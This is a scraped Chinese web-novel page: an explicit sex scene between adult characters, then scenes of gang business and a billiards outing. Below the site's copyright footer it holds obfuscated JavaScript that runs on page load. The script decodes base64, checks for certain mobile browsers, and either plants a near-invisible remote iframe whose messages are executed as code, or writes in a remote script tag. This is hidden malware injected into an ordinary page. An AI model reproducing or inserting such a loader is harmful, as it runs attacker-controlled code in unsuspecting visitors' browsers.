嗯。”薛诺凑到短发美女的耳边,用极小的声音说了几句,“姐姐,那里是很精贵的,你把嘴张大,牙齿就不会划到了。”司徒清影的脸一红,没有说话,要小妹妹教自己怎么让男人开心,还真是有点儿没面子,但这确实是自己第一次为异性口交,还是虚心一点儿吧。她再次含住了g头儿,这次是把樱口张到了最大,绝对避免银牙和r棒的接触。侯龙涛脸上露出了微笑,双手枕到脑后,深吸一口气…第一百一十四章 警民合作 6/14/2003-6/28/2003“用一只手握住根部,然后上下套,另一只手可以在涛哥的腿上抚摸,”要不是因为这话是从清纯可爱的薛诺嘴里说出来的,还真像是经验丰富的老鸨在教导刚刚下海接客的雏妓,“或…或者在自己身上摸也可以啊,别光用嘴唇儿磨,也要用舌头绕着顶端打转儿或是上下舔。”侯龙涛这叫一个乐啊,伸手拉了拉美少女的脚踝。“嗯?”薛诺扭头看了男人一眼,看到他在冲自己微笑,就还了一个娇媚的笑脸,然后又开始指导干姐姐的口交动作,“要尽量往喉咙里c,越深涛哥就越舒服。”她的表情还挺认真的,平时都是几个妈妈、姐姐教她做a的技巧,今天总算轮到她自己当老师了。“六九吧。”侯龙涛嘟囔了一句,他看薛诺那么用心,就把注意力集中到了另一个美女身上。“六九”是什么意思,司徒清影还是知道的,她嘴里叼着美味的yj,缓缓的挪动身体,转了180度,跨跪到了男人的脸上。侯龙涛把美女的裙摆撩起来,搭在她的后背上,将白色的小内k勒入她深深的臀缝中,双手捏住圆滚的p股蛋儿,稍稍抬头,口鼻就埋进了芳香四溢的臀沟里,“嗯…”他很满足的发出了一声叹息。司徒清影本以为男人上来就会舔吻,却发觉他是在很陶醉的闻自己,就好像要把自己下t的气味儿都吸走一样。这种亲密的方式虽然不能给r体带来多少直接的快感,女方在心理上却能得到比被“单刀直入”更大的满足,因为她能体会到男人对自己身体的迷恋、珍爱程度…这天之后,何莉萍家就多了一位常客,母女三人共进晚餐,欢乐祥和的气氛决不下真正的家庭。在这方面,司徒清影的行动并不隐秘,有一次她的两个哥哥警告她不要和“东星”的人走得太近,她只是神神秘秘的一笑,跟了一句“我已经走的不能再近了,你们知道我对什么感兴趣”,结果就是“霸王龙”身边大部分的人都以为她是在挖“盟友”的墙角儿…日子一天一天的过着,“非点”造成的恐慌也消退的差不多了,不过对于娱乐场所的“禁令”还没有取消,所以“东星”与“霸王龙”的合作还未正式开始,但双方总算是不再继续冲突了,局外人还看不出来,道儿上的却都突然觉得北京的空气中没有了个把月来弥漫的那种紧张气氛。侯龙涛总体上过得挺自在,可也有不爽的地方,玉倩定在七月十日回国,现在离那个日子越来越近了,小丫头打回国的电话也变得越来越勤,那个大小姐原来就没顾过时差,现在更是不顾了,他连着好几天半夜从睡梦中被电话铃声惊醒,最后不得不拔掉座机,关上手机,但只用了一次他就放弃了这个法子,因为比起第二天来个ear full,还是晚上被吵好…一个星期六的上午,侯龙涛带着陈氏姐妹,和他的几个兄弟在“东星初升”的台球儿厅里玩耍,“东星”的所有娱乐性产业都已经通过了卫生部门的检查,下星期一就可以恢复营业了。从初中开始,他们打球儿就是带响儿的,最早的时候是一个球儿五毛钱,到侯龙涛开始在美国上学,也只不过是一个球儿五元,本来就是自己人玩儿玩儿嘛,可现在发财了,价码儿也提高到了五百块。两个女孩儿打得不好,也就没跟他们凑合,单独在屋角儿开了一张按子。侯龙涛不自量力,挑战北京体育大学台球儿系毕业的岑二德子,又加上他久疏战阵,四台下来就扔了六千,第五台更是被杀了个七星儿,“r,不打了。”他赌气的把球儿杆儿扔给文龙,自己走向陈氏姐妹,还是陪美女有意思。“又输了?”陈曦笑嘻嘻的瞧了一眼一脸黑气的男人,“谁让你老跟最好的打的。”“切,就是因为老不练了,当年出国之前,老泡在台球儿厅,跟他有一拼。”两个女孩儿都是一笑,自己的爱人已经是绝对的出色了,他要是什么都是最棒的,那不成了“人神配”,不完美才是真正的生活。“几比几啊?”侯龙涛走到陈倩身后,抱住她的细腰,她在脖颈上一吻,看着满台散开的球儿问。“二比零,我赢着呢,都是赢好几个球儿。”陈曦马上过来表功,身体凑到爱人和姐姐中间,三个人挤成了一堆儿。“这么半天才打了两把?”男人的五官都挤到一块儿了。“怎么了?我们打的不好嘛。”“呵呵,还挺谦虚的。”侯龙涛展开左臂,把陈曦也揽到了身前,亲了亲她的额头。陈倩转过身,这一来,两朵高矮差不多的散发着茉莉芳香的长发姐妹花儿就都偎到了男人的怀里。一对儿仙女儿般的美人同时抬起秀面,在爱人的左右脸颊上各吻了一口,三个人就这么开始轮流接起了吻。“你怎么那么笨啊?”侯龙涛捏了捏陈倩的p股,“连着输给小曦。”“我又不喜欢玩儿这个,当然打的不好了。”“我也不爱玩儿啊,不过打的还是比姐姐好。”“你们都对台球儿没兴趣?”“没有。”“那还吵着要跟我来?”“跟你在一起嘛,根本不在乎是做什么。”陈曦的这句话说得很自然,没有丝毫的做作。侯龙涛突然觉得眼眶一热,把姐妹俩搂得更紧了,“走吧,不玩儿了,我陪你们去逛商场。”“好啊,”陈曦抬起头,“你这种喜欢逛商场的大男人还真少见。”“哼哼。”男人笑了笑,没有对爱妻的话发表评论,这个世界上,除了同性恋,其他的男人没有喜欢逛商场的,他回头冲几个兄弟喊了一句,“我陪我老婆去逛街,有事儿也别找我。”两女一男刚在一群人的笑骂声中出了台球儿厅,侯龙涛的手机就响了起来,“喂。”“太子哥,我二毛儿啊,您上回让我们留意的那件事儿有眉目了。”“什么叫有眉目了?”“我们找到人了。”“能肯定吗?”“能有九成儿的把握。”“好,你现在马上到‘初升’来,我在台球儿厅等你。”侯龙涛收起电话,还没来得及解释,陈倩就先说话了,“我和小曦自己去逛就行了,不过你…”她刚才看着男朋友的神情由放松转为严肃,知道他有正事儿要做了,但又有点儿担心。“放心吧,”侯龙涛抱住美女吻了吻,“不是危险的事情,
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}